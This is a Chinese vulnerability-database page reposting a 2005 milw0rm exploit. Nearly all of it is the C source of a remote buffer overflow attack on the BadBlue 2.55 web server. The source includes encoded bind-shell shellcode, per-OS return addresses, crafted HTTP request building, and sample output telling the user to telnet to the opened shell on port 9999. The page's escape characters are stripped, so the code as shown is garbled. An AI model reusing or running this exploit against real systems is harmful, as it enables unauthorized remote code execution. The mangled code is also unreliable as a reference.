BadBlue 2.55 – Web Server Remote Buffer Overflow
| 漏洞ID | 1054931 | 漏洞类型 | |
| 发布时间 | 2005-02-27 | 更新时间 | 2005-02-27 |
![图片[1]-BadBlue 2.55 – Web Server Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-BadBlue 2.55 – Web Server Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* Badblue 2.55 Web Server remote buffer overflow
* ( Version: BadBlue Personal Edition v2.55 Date: Dec. 9, 2004 )
*
* Tested under Windows 2000 Professional SP3/SP4 Spanish
* Windows 2000 Server SP4 Spanish
* Windows XP SP1 Spanish
*
* Credits:
* Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* http://lists.netsys.com/pipermail/full-disclosure/2005-February/032029.html
*
* Exploit by : Miguel Tarascó Acuña
* Tarako AT Haxorcitos.com
* Exploit Date: 26/12/2004
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr
*
***************************************************************************
*
* D:expl_badblueRelease>badblue.exe 192.168.1.82 80 1
*
* Badblue 2.55 Web Server - Remote buffer overflow
* Tarako AT Haxorcitos.com
*
* [i] Retrieving HTTP Server Header
* [i] Server : BadBlue/2.5
* [i] Connected : Yes
* [i] Target : Win2k Professional SP3/SP4 & Server SP4 (ext.dll)
* [i] Work : Complete
* [i] Now : telnet 192.168.1.82 9999
*
***************************************************************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
#define TIMEOUT 1
#define VALIDSERVER "BadBlue/2.5"
#define GETHEADER "HEAD HTTP/1.1rnrn"
#define HTTPSEND1 "GET /ext.dll?mfcisapicommand="
#define HTTPSEND2 "&page=index.htx HTTP/1.1n
Accept: */*n
Accept-Language: esn
Accept-Encodin: gzip, deflaten
User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)n
Host: "
#define HTTPSEND3 "nConnection: Keep-Alivernrn"
#define LEN 500
char shellcode[]=
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xAFx87x03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";
struct TARGETS {
int num;
char name[58];
char offset[5];
} targets[]= {
// char offset[]="x56x66x46x78"; // ntdll.dll V. 5.0.2195.6899 Windows 2k Spanish (CALL EBX)
// char offset[]="x37x25x01x10"; // ext.dll V. 1.0.0.1 (CALL EBX) Windows 2k SP4 Spanish
// char offset[]="x3ExFAx02x10"; // ext.dll V. 1.0.0.1 (FF55 0C CALL [EBP+C]) Windows XP SP1 Spanish
{ 0, "WinXP Professional SP1 (ext.dll)", "x3ExFAx02x10" }, // CALL [EBP+C]
{ 1, "Win2k Professional SP3/SP4 & Server SP4 (ext.dll)", "x37x25x01x10" }, // CALL EBX
//{ 2, "Crash", 0x41414141 }, // crash
};
char jmp[]="xEBx07"; // JMP $+9 (EB 07) To jump the offset
char jmpback[]="xE9x0DxFExFFxFF"; // JMP $-494 (E9 0DFEFFFF) To jump to the beginning of the shellcode
int CheckHeader(SOCKET s,struct sockaddr_in sa) { // Server: BadBlue/2.5
timeval tiempo;
fd_set fdset;
int leido; // Bytes leidos en el recv
char buffer[1024]; // Buffer de lectura con el recv
char version[11];
int retorno=0;
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
printf("n [e] Error: socket():%dn", WSAGetLastError());
return(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("n [e] Error: connect()");
return(1);
}
send(s,GETHEADER,strlen(GETHEADER),0);
tiempo.tv_sec=TIMEOUT; // TimeOut del Select
tiempo.tv_usec=0;
FD_ZERO( &fdset ); // Inicializa FDSet a NULL
FD_SET( s, &fdset ); // Añade el descriptor AcceptedSocket a FDSet
if ((select( s + 1 , &fdset , NULL , NULL , &tiempo )) >0) {
if (FD_ISSET(s,(fd_set FAR *)&fdset)) { // True si ConnectSocket esta en FDSet
memset(&buffer, 0, sizeof(buffer));
if ((leido=recv( s,buffer,sizeof(buffer),0 )) > 0) {
if (leido > 42) {
strncpy(version,buffer+32,strlen(VALIDSERVER));
printf("n [i] Server : %s",version);
if (strncmp(version,VALIDSERVER,strlen(VALIDSERVER))!=0) retorno=1;
}
else retorno=1;
}
else {
printf("n [e] Server : Unknown");
retorno=1;
}
}
}
closesocket(s);
return(retorno);
}
void main(int argc, char *argv[]) {
SOCKET s;
WSADATA HWSAdata;
struct sockaddr_in sa;
char *buffer=NULL;
UINT i;
printf("n Badblue 2.55 Web Server - Remote buffer overflow");
printf("n Tarako AT Haxorcitos.comn");
if ( (argc!=4) || (atoi(argv[3])>=sizeof(targets) / sizeof(struct TARGETS))) {
printf("n OS:",argv[0]);
for (i=0;i<(sizeof(targets) / sizeof(struct TARGETS));i++) {
printf("n %i - %s",i,targets[i].name);
}
printf("nn Usage: %s <IP> <Port> <OS> n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
printf("n [e] Error: WSAStartup():%dn", WSAGetLastError());
exit(1);
}
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
printf("n [e] Error: socket():%dn", WSAGetLastError());
exit(1);
}
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(atoi(argv[2]));
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);
printf("n [i] Retrieving HTTP Server Header");
if (CheckHeader(s,sa)==1) {
printf("n [i] Aborting exploitnn");
exit(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("n [e] Error: connect()");
exit(1);
}
printf("n [i] Connected : Yes");
printf("n [i] Target : %s ",targets[atoi(argv[3])].name);
buffer=(char*)malloc(sizeof(char)*(strlen(HTTPSEND1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1));
memset(buffer,0,strlen(HTTPSEND1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1);
memcpy(buffer,HTTPSEND1,strlen(HTTPSEND1));
for( i=strlen(HTTPSEND1);i<(LEN+strlen(HTTPSEND1));i++) buffer[i]=(BYTE)0x90;
memcpy(buffer+strlen(HTTPSEND1),shellcode,strlen(shellcode));
memcpy(buffer+strlen(HTTPSEND1)+485,jmp,strlen(jmp));
memcpy(buffer+strlen(HTTPSEND1)+489,targets[atoi(argv[3])].offset,strlen(targets[atoi(argv[3])].offset));
memcpy(buffer+strlen(HTTPSEND1)+494,jmpback,strlen(jmpback));
memcpy(buffer+strlen(HTTPSEND1)+LEN,HTTPSEND2,strlen(HTTPSEND2));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEND2),argv[1],strlen(argv[1]));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEND2)+strlen(argv[1]),HTTPSEND3,strlen(HTTPSEND3));
send(s,buffer,strlen(buffer),0);
closesocket(s);
printf("n [i] Work : Complete");
printf("n [i] Now : telnet %s 9999n",argv[1]);
}
// milw0rm.com [2005-02-27]相关推荐: TipxD 1.1.1 – Not SETUID Local Format String
TipxD 1.1.1 – Not SETUID Local Format String 漏洞ID 1054798 漏洞类型 发布时间 2004-12-14 更新时间 2004-12-14 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666